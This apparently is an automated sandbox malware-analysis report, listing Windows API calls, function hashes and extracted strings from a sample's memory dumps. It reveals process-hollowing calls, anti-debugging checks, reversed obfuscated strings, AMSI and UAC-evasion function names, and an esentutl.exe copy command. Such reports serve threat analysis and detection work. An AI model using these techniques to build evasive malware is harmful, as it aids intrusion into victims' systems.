                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3764614163-0
                                                                                                                                • Opcode ID: 6c1762db6b4a9aa2cc43e0484604410445ae9adca72218fdcab02a2f436e8ad3
                                                                                                                                • Instruction ID: f136d701f76cf2452534bb099dad970d2e84d65eb49685b700266cf4fc268102
                                                                                                                                • Opcode Fuzzy Hash: 6c1762db6b4a9aa2cc43e0484604410445ae9adca72218fdcab02a2f436e8ad3
                                                                                                                                • Instruction Fuzzy Hash: 9321E071A40319BEEB10EBA0DD56FDEB7BDEB04B00F5144A1B604F71D0DBB4AA048A64
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                • API String ID: 3130163322-2353454454
                                                                                                                                • Opcode ID: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                                • Instruction ID: b4156115f14dee8d39c35aa82bb7842d7eaaf1645aaf0c428994067ac26b9ea6
                                                                                                                                • Opcode Fuzzy Hash: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                                • Instruction Fuzzy Hash: 9211E5B2654258AFEB40EFA8DD41F9A77EDEB0C740F5144A0FA08D7250C634FD159B25
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                • API String ID: 4072585319-445027087
                                                                                                                                • Opcode ID: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                                • Instruction ID: d23e4f91fa0960da7e273cc3fe5a9162521a241682b36118c561ac0a532a118c
                                                                                                                                • Opcode Fuzzy Hash: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                                • Instruction Fuzzy Hash: A1116DB5654308BFEB00EFA4DC41EAEB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                • API String ID: 4072585319-445027087
                                                                                                                                • Opcode ID: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                                • Instruction ID: 8388146c6a95389dc2769de29c0f941351b9eb95c78c470c125d64e1f822c128
                                                                                                                                • Opcode Fuzzy Hash: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                                • Instruction Fuzzy Hash: 9D116DB5654308BFEB00EFA4DC41E9EB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                • API String ID: 2521977463-737317276
                                                                                                                                • Opcode ID: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
                                                                                                                                • Instruction ID: 4416821152efddc7df5757196051053e39fe12a0bcaf38e925373375cc6836f0
                                                                                                                                • Opcode Fuzzy Hash: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
                                                                                                                                • Instruction Fuzzy Hash: 5E0140B5644318BFEB00EFA4DC41E9AB7FDEB4D700F9184A0F908D7650DA34A9159B64
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                • API String ID: 2719805696-3542721025
                                                                                                                                • Opcode ID: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
                                                                                                                                • Instruction ID: ddbd965f134c26a55d869f5fea77957af354fd61dad7dd9a68ceb4cbc746443f
                                                                                                                                • Opcode Fuzzy Hash: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
                                                                                                                                • Instruction Fuzzy Hash: 14012DB5654314AFDB00EFA8DC41E5AB7EDEB49700F908890B908D7650DA30AD159B75
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                • API String ID: 3503870465-2520021413
                                                                                                                                • Opcode ID: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
                                                                                                                                • Instruction ID: 49158d26d9311c15c17309da22fd1708ef641e0c56c2a26098a1afc479a9023a
                                                                                                                                • Opcode Fuzzy Hash: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
                                                                                                                                • Instruction Fuzzy Hash: C201A2B4A44304AFEB00EFA4DC41E5EB7FEEB48740F9084E0F40497610DA34A905DA24
                                                                                                                                APIs
                                                                                                                                • RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                                • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Path$DeleteFileNameName_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4284456518-0
                                                                                                                                • Opcode ID: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
                                                                                                                                • Instruction ID: 7e57c1e19183b966585c856fc1901b44e08328d363bdf6be433c6ecf41e8b3b6
                                                                                                                                • Opcode Fuzzy Hash: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
                                                                                                                                • Instruction Fuzzy Hash: 4C01A275A4430A6EEB05DBA08D55FCD77B9AB44304F5005D29204E6081DAB4AB088B24
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                                • RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                                • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                                  • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1530111750-0
                                                                                                                                • Opcode ID: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
                                                                                                                                • Instruction ID: af9d69ab82114b9e8ef285d9bb1cec7df01d799a0ad4891b53d89aa00e2aabc6
                                                                                                                                • Opcode Fuzzy Hash: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
                                                                                                                                • Instruction Fuzzy Hash: A701F47194030DBEEB11EBA0DD56FCDB3BDEB48700F9145E1E605E6590EA74AB088A64
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B26D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,02B26EAC,00000000,00000000,02B26E2B,?,00000000,02B26E9B), ref: 02B26E17
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromInstanceProg
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2151042543-0
                                                                                                                                • Opcode ID: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                                • Instruction ID: 65ce6676ed6112fabea7441798b2c83f6ccd0f2f1b98e0c1ec686466d75e23e9
                                                                                                                                • Opcode Fuzzy Hash: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                                • Instruction Fuzzy Hash: 9B01F231608708AEF711EF61DC6296FBBBDE749B00B9108B5F409E2690EA309D14C964
                                                                                                                                APIs
                                                                                                                                • InetIsOffline.URL(00000000,00000000,02B3B784,?,?,?,00000000,00000000), ref: 02B2F801
                                                                                                                                  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                  • Part of subcall function 02B2F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
                                                                                                                                  • Part of subcall function 02B2F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
                                                                                                                                  • Part of subcall function 02B2F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
                                                                                                                                  • Part of subcall function 02B2F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
                                                                                                                                  • Part of subcall function 02B2F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
                                                                                                                                  • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                  • Part of subcall function 02B1C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C8B8B8,?,02B30751,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession), ref: 02B1C37B
                                                                                                                                  • Part of subcall function 02B2DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
                                                                                                                                  • Part of subcall function 02B2DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
                                                                                                                                  • Part of subcall function 02B2DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
                                                                                                                                  • Part of subcall function 02B2DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
                                                                                                                                  • Part of subcall function 02B2DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
                                                                                                                                  • Part of subcall function 02B17E80: GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
                                                                                                                                  • Part of subcall function 02B18048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B3370D,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8), ref: 02B18055
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y 